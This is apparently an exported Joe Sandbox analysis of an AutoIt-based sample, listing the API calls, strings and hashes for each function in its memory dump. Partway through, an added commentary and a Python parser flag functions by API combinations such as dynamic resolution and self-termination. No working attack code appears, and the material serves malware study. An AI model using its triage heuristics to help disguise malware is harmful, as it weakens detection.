                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: D5|$D5|$D5|$D5|$D5|D5|
                                        • API String ID: 1385522511-2350473382
                                        • Opcode ID: edaf0c38fc5e3edb1fe1ba07050164632748c10280c9ce6f49504ea54767eca5
                                        • Instruction ID: 2b0105a27a2d6f9f9b8b562f115f15d02af4be7102d5944f332bca6cffe88def
                                        • Opcode Fuzzy Hash: edaf0c38fc5e3edb1fe1ba07050164632748c10280c9ce6f49504ea54767eca5
                                        • Instruction Fuzzy Hash: 6BB26D74A08341CFDB24CF18C480B6AB7E1BF96720F648A5DE9858B391D779ED41CB92

                                        Control-flow Graph

                                        • Graph for the function starting at 006F2A52 (nodes marked Executed / Not Executed in the interactive report; not rendered in this text export)
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006F2A9B
                                        • CoUninitialize.COMBASE ref: 006F2B3A
                                        • UnregisterHotKey.USER32(?), ref: 006F2D1F
                                        • DestroyWindow.USER32(?), ref: 007339F5
                                        • FreeLibrary.KERNEL32(?), ref: 00733A5A
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00733A87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: a2c7ef07c14df86097d4edbc5c7ad86dbc8c1aea686c92ba1c509ddbfdb747f4
                                        • Instruction ID: 12271c3962241f8806488fec7eda6aede7666627f61eb54317e74f4ab0a21aa9
                                        • Opcode Fuzzy Hash: a2c7ef07c14df86097d4edbc5c7ad86dbc8c1aea686c92ba1c509ddbfdb747f4
                                        • Instruction Fuzzy Hash: 8BD17E71701216CFDB29EF14C499A79F7A2BF04700F1481ADE94AAB292DB34AD52CF85

                                        Control-flow graph (interactive graph and its executed / not-executed colouring not reproduced). Function at 0076874A; its basic blocks call GetCurrentDirectoryW and SetCurrentDirectoryW (76886d), GetFileAttributesW and SetFileAttributesW (768940), and SetCurrentDirectoryW again at 768969, 7689b5 and 768a02 (directory restore on the exit paths).
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00768907
                                        • SetCurrentDirectoryW.KERNELBASE(?), ref: 0076891B
                                        • GetFileAttributesW.KERNEL32(?), ref: 00768945
                                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0076895F
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00768971
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007689BA
                                        • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00768A0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile
                                        • String ID: *.*
                                        • API String ID: 769691225-438819550
                                        • Opcode ID: 29ffa1ee68083cbd056da9380d0c12defe14211e05040988eeebb130a891d436
                                        • Instruction ID: f5980677f5213d8d03c2593ea6b3147663621b52d9f82429db5fc993b9c524c5
                                        • Opcode Fuzzy Hash: 29ffa1ee68083cbd056da9380d0c12defe14211e05040988eeebb130a891d436
                                        • Instruction Fuzzy Hash: 7E81BF725143059FCBA0EF64C444AAAB3E9BF84310F584A1EF986D7251DB38E944CB93
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d1482f6894bb774a3f9b333d8451071375bd3e559dbe5f09e3c64d015eceb31
                                        • Instruction ID: 53cfa46cf2d8e138f1c5b05d91d84ffb9daa142f8f210b375c022c6666d01f58
                                        • Opcode Fuzzy Hash: 3d1482f6894bb774a3f9b333d8451071375bd3e559dbe5f09e3c64d015eceb31
                                        • Instruction Fuzzy Hash: 92C1C6B0E04259EFDB11DFA8E845BAD7BB4AF09310F184159E614A73D3C7389D42CB65
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006F3568
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006F3589
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,006F32EF,?), ref: 006F359D
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,006F32EF,?), ref: 006F35A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: c13ea39f5abb8b53604e812d9d2f9f195960e6a0495b8869d6d7907b50cc31c4
                                        • Instruction ID: 1d4d239e787e7ca3ee6ed5d54bf81fa1159ead4f0fa3da4fd5b933af6f4e5f59
                                        • Opcode Fuzzy Hash: c13ea39f5abb8b53604e812d9d2f9f195960e6a0495b8869d6d7907b50cc31c4
                                        • Instruction Fuzzy Hash: 11F0DA716403D47AE73157176C48E372FBDE7C6F50B10802EB904A71A1D66D1C52DBB8
                                        APIs
                                        • LoadLibraryA.KERNEL32 ref: 0074E72B
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0074E73D
                                        • FreeLibrary.KERNEL32(00000000), ref: 0074E763
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: GetSystemWow64DirectoryW$X64
                                        • API String ID: 145871493-2590602151
                                        • Opcode ID: 0d5c203efc5afe0a320706b07ed0a70caf85d752d927b75dd7af8da933eb595a
                                        • Instruction ID: d794ab7b50b646ec9f1fe3752279ce18585e17ec53e2d764de425087160193c2
                                        • Opcode Fuzzy Hash: 0d5c203efc5afe0a320706b07ed0a70caf85d752d927b75dd7af8da933eb595a
                                        • Instruction Fuzzy Hash: 32E0ED71C42624EBDB732B208C4CEAD6729BF10B60F264969F801E2091DB3CDC44878A
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006F55EB,SwapMouseButtons,00000004,?), ref: 006F561C
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006F55EB,SwapMouseButtons,00000004,?), ref: 006F563D
                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,006F55EB,SwapMouseButtons,00000004,?), ref: 006F565F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: c401431bdf85aa224c2400611052732cd325672188e0f9f2d05fbe936248d7e9
                                        • Instruction ID: 1cf3c63479d7d2064cdd5d7b0876ab1780427a9fa8791aac8aecb42c24068d51
                                        • Opcode Fuzzy Hash: c401431bdf85aa224c2400611052732cd325672188e0f9f2d05fbe936248d7e9
                                        • Instruction Fuzzy Hash: FC115A71610608BFDB208F64DC40DFE77B9EF00744F508469AA16D7220E6719E419764
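The strings in the blocks above (the "AutoIt v3" window class with its child edit control, the "X64" check that resolves GetSystemWow64DirectoryW through LoadLibraryA and GetProcAddress, the Control Panel\Mouse SwapMouseButtons read, the mciSendStringW "close all" cleanup) belong to the AutoIt v3 runtime in which the script executes, so most of the functions listed here are interpreter code rather than the injected payload. What makes a listing like this useful is being able to query it. The script below is an added example; it is not part of the Joe Sandbox report and not code from the sample. It parses the per-function "APIs" and "Similarity" lines in the shape printed above, pulls out the export names the binary resolves at run time via GetProcAddress, and flags functions by the combination of APIs they call. The line format is assumed from the report as rendered here, the input is a constructed excerpt of three blocks copied from above with argument lists shortened, and the triage rule labels are my own, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: three function blocks in the shape the report prints
# above ("APIs" list, then the "Similarity" block). Argument lists are shortened.
SAMPLE_REPORT = """\
APIs
• LoadLibraryA.KERNEL32 ref: 0074E72B
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0074E73D
• FreeLibrary.KERNEL32(00000000), ref: 0074E763
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: GetSystemWow64DirectoryW$X64
• Instruction Fuzzy Hash: 32E0ED71C42624EBDB732B208C4CEAD6729BF10B60F264969F801E2091DB3CDC44878A
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\\Mouse,00000000,00000001,00000000), ref: 006F561C
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 006F563D
• RegCloseKey.KERNELBASE(00000000), ref: 006F565F
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\\Mouse
• Instruction Fuzzy Hash: FC115A71610608BFDB208F64DC40DFE77B9EF00744F508469AA16D7220E6719E419764
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00778C52
• TerminateProcess.KERNEL32(00000000), ref: 00778C59
• FreeLibrary.KERNEL32(?,?,?,?), ref: 00778E3A
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• Instruction Fuzzy Hash: 84125D71A04340DFCB54CF28C488B2ABBE5FF88354F14895DE9898B292CB75ED45CB92
"""

# One "• Name.MODULE(args), ref: ADDR" line. The parenthesised argument list and
# the "Part of subcall function XXXX:" prefix are both optional in the report.
API_LINE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str        # call-site address as printed by the report
    subcall: bool   # True for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""

    @property
    def names(self) -> set:
        """APIs called directly by this function (subcall lines excluded)."""
        return {a.name for a in self.apis if not a.subcall}

    @property
    def first_ref(self) -> str:
        """Lowest direct call-site address, used as the function's label."""
        direct = [a.ref for a in self.apis if not a.subcall]
        return min(direct) if direct else ""

def parse_report(text: str) -> list:
    """Split report text into one FunctionRecord per APIs/Similarity block."""
    records = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        # "APIs" opens a block; "Similarity" also opens one when the preceding
        # block already has its hash (a function that lists no API calls).
        if line == "APIs" or (line == "Similarity" and (current is None or current.fuzzy_hash)):
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            current.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                        m.group("ref").upper(), bool(m.group("sub"))))
            continue
        for key, attr in (("• API ID:", "api_id"), ("• String ID:", "string_id"),
                          ("• Instruction Fuzzy Hash:", "fuzzy_hash")):
            if line.startswith(key):
                setattr(current, attr, line[len(key):].strip())
    return records

# Hypothetical triage rules (my labels): predicate over the set of direct API names.
TRIAGE_RULES = [
    ("dynamic API resolution (LoadLibrary + GetProcAddress)",
     lambda n: "GetProcAddress" in n and any(x.startswith("LoadLibrary") for x in n)),
    ("self-termination (GetCurrentProcess + TerminateProcess)",
     lambda n: {"GetCurrentProcess", "TerminateProcess"} <= n),
    ("registry read",
     lambda n: any(x.startswith("RegQueryValue") for x in n)),
]

def triage(records) -> list:
    """(first_ref, label) for every function whose API set matches a rule."""
    return [(r.first_ref, label) for r in records for label, pred in TRIAGE_RULES if pred(r.names)]

def resolved_imports(records) -> list:
    """(call site, export name) for GetProcAddress calls whose name argument is a string."""
    out = []
    for r in records:
        for a in r.apis:
            if a.name == "GetProcAddress" and len(a.args) >= 2 \
                    and not re.fullmatch(r"[0-9A-Fa-f?]+", a.args[1]):
                out.append((a.ref, a.args[1]))
    return out

if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for ref, label in triage(recs):
        print(ref, label)
    for ref, name in resolved_imports(recs):
        print(ref, "GetProcAddress ->", name)
```

Run against the full text of this section rather than the excerpt and the registry and dynamic-resolution hits point at the blocks above, while the GetCurrentProcess/TerminateProcess hit points at the CRT-style abort routine listed further down; the "Part of subcall function" lines are kept but excluded from a function's own API set so inherited calls do not trigger rules on the caller.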
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,0078DC30), ref: 0075DABB
                                        • GetLastError.KERNEL32 ref: 0075DACA
                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0075DAD9
                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0078DC30), ref: 0075DB36
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                        • String ID:
                                        • API String ID: 2267087916-0
                                        • Opcode ID: 17da639fcff2e87758d8b2d4e33943b447c42a7fec62d14f150e865280820451
                                        • Instruction ID: 956e8563ce232050bea256b8dc198f62ab744f85b8f8ac41ba14da768fe906b3
                                        • Opcode Fuzzy Hash: 17da639fcff2e87758d8b2d4e33943b447c42a7fec62d14f150e865280820451
                                        • Instruction Fuzzy Hash: 0F21BF705482059F8730DF24C8818ABB7E5EF59365F204A1DF8A9C32E1E774DD0ACB56
                                        APIs
                                        • GetOpenFileNameW.COMDLG32(?), ref: 00734115
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                          • Part of subcall function 006F39DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006F39FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Name$Path$FileFullLongOpen
                                        • String ID: X$`u{
                                        • API String ID: 779396738-1012507993
                                        • Opcode ID: 47efea71297c16791b31e9a05ee2c21492b95e325dc359decd21b3c3c829b41f
                                        • Instruction ID: 201aa45603083f3cd8eb2c35a8b25329f2eb7f86cbb5cc2734eded86d7d75213
                                        • Opcode Fuzzy Hash: 47efea71297c16791b31e9a05ee2c21492b95e325dc359decd21b3c3c829b41f
                                        • Instruction Fuzzy Hash: D321C671A0429C9BDB55DF98C805BEE7BF9AF49300F004059E505A7381DBF89A89CBA5
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 007109F8
                                          • Part of subcall function 00713634: RaiseException.KERNEL32(?,?,?,00710A1A,?,00000000,?,?,?,?,?,?,00710A1A,00000000,007B9758,00000000), ref: 00713694
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00710A15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: 912fbc25f4e06bcfb80edbb8e3ed709b97a5c5bd67a6bbc0d6736db4da58b895
                                        • Instruction ID: 0733c631e5b575de3d20eb974c439d39cf7ff98bb21d1c8e00d5335bc011327e
                                        • Opcode Fuzzy Hash: 912fbc25f4e06bcfb80edbb8e3ed709b97a5c5bd67a6bbc0d6736db4da58b895
                                        • Instruction Fuzzy Hash: E7F0627590020DF78B04BABCEC5A9DD7B6C5E00750BA04161B924A65E2EBBCEED6C5C0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: %.3d$X64
                                        • API String ID: 481472006-1077770165
                                        • Opcode ID: c4db589c2cc5117eda98b8f629fcdb349ecea7c3e45b8d29054c155a74f530c5
                                        • Instruction ID: c058a086c8edb82d915c0bda8689902c65bec6e5dff5f37c6e9478f9ed34e676
                                        • Opcode Fuzzy Hash: c4db589c2cc5117eda98b8f629fcdb349ecea7c3e45b8d29054c155a74f530c5
                                        • Instruction Fuzzy Hash: FFD062B1C04159D5CBE09A90DD499BDB3BCB718710F648852F906D1041E73C95599722
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00778C52
                                        • TerminateProcess.KERNEL32(00000000), ref: 00778C59
                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00778E3A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFreeLibraryTerminate
                                        • String ID:
                                        • API String ID: 146820519-0
                                        • Opcode ID: 7e9a07a381949f1d9be2ad79ef277b90832e841d08bbb0b6399a1455f65dd37c
                                        • Instruction ID: 0bacaa69b1707b7fb70233659243c6c422df7a9bfada78edc5258b33164cfcdd
                                        • Opcode Fuzzy Hash: 7e9a07a381949f1d9be2ad79ef277b90832e841d08bbb0b6399a1455f65dd37c
                                        • Instruction Fuzzy Hash: 84125D71A04340DFCB54CF28C488B2ABBE5FF88354F14895DE9898B292CB75ED45CB92
                                        APIs
                                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 006F6CA1
                                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 006F6CB1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: a4259b8682736a13bef2bbee383b609779c9b83c20940c6ca4c2c3811290ce3d
                                        • Instruction ID: c3e798e4342fc30196c33bdb8386c0c0d6ded979bddb18b49cac9d63ef8aa29d
                                        • Opcode Fuzzy Hash: a4259b8682736a13bef2bbee383b609779c9b83c20940c6ca4c2c3811290ce3d
                                        • Instruction Fuzzy Hash: F5314C71A00609EFDB14CF68C980BA9B7B6FB04314F148629FA9597340D7B1FE94DB90
                                        APIs
                                          • Part of subcall function 006F5F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 006F6049
                                        • KillTimer.USER32(?,00000001,?,?), ref: 0070FD44
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0070FD53
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0074FDD3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer$Kill
                                        • String ID:
                                        • API String ID: 3500052701-0
                                        • Opcode ID: a387e9f9ad645aed1fb1c989724f88c606eedb68d7487a331849b7d181db6184
                                        • Instruction ID: 44697bc707cfadeebe2ae0b3a0d495d21aa502e810ae95a7f089221c33620eab
                                        • Opcode Fuzzy Hash: a387e9f9ad645aed1fb1c989724f88c606eedb68d7487a331849b7d181db6184
                                        • Instruction Fuzzy Hash: CB31C570E04344AFEB32CF248865BE6BBECAF06304F1044AEE5D997281C7785A85CF55
                                        APIs
                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,0072895C,?,007B9CE8,0000000C), ref: 00728A94
                                        • GetLastError.KERNEL32(?,0072895C,?,007B9CE8,0000000C), ref: 00728A9E
                                        • __dosmaperr.LIBCMT ref: 00728AC9
                                        Similarity
                                        • API ID: CloseErrorHandleLast__dosmaperr
                                        • String ID:
                                        • API String ID: 2583163307-0
                                        • Opcode ID: 3c8786aa258c712446939be49d2a70b742446e67c92ccf4d2c5ffe89b3c2f535
                                        • Instruction ID: fb113c7b1a4c44990e8440305d78e4f71138028ae5970ddfa9c1b76744367ffb
                                        • Opcode Fuzzy Hash: 3c8786aa258c712446939be49d2a70b742446e67c92ccf4d2c5ffe89b3c2f535
                                        • Instruction Fuzzy Hash: 06016F32607170C6D6A423347889B7E27654B81734F29C22EF8089B1D3DE7E8C804292
                                        APIs
                                        • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,007297CA,FF8BC369,00000000,00000002,00000000), ref: 00729754
